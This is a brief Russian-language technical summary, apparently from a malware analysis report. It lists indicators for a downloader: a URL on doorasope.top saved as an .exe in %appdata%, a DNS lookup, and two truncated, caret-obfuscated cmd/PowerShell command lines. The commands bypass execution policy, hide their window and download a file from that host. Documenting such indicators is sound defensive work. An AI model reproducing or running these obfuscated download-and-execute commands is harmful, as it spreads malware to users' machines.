Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^eR^SH^elL.eXE ^-e^X^Ecu^TIoN^POliCY by^PASS -n^opRO^FILE -w^in^dO^WSty^LE H^Id^DeN (^n^E^w-obJeCt^ ^syst^em^.NE^T.^WE^b^C^LieN^T)^.d^o^WnlOADFi^le^('http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pow^eR^SH^elL.eXE ^-e^X^Ecu^TIoN^POliCY by^PASS -n^opRO^FILE -w^in^dO^WSty^LE H^Id^DeN (^n^E^w-obJeCt^ ^syst^em^.NE^T.^WE^b^C^LieN^T)^.d^o^WnlOADFi^le^('http://www.doorasope...' (со скрытым окном)